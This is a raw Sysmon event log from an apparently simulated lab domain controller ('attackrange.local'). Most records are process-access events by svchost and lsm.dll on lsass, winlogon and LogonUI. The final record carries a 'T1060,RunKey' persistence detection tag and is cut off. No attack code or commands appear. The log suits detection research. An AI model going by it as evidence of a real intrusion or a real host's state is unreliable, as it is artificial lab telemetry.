09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1300-00000000FC01}676C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0E00-00000000FC01}984C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0900-00000000FC01}564C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.681{5EBD8912-7F30-614D-1600-00000000FC01}12684572C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+2870|c:\windows\system32\themeservice.dll+26d8|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.681{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29317442861B708EEA6E9E9BC909EE8D,SHA256=F90BB1117A9990564DB0FD3CC85E801C5F06E3E88C18C1638A21F9699D2B541F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F30-614D-0E00-00000000FC01}9841064C:\Windows\system32\LogonUI.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0E00-00000000FC01}984C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0900-00000000FC01}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.665{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0900-00000000FC01}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.572{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 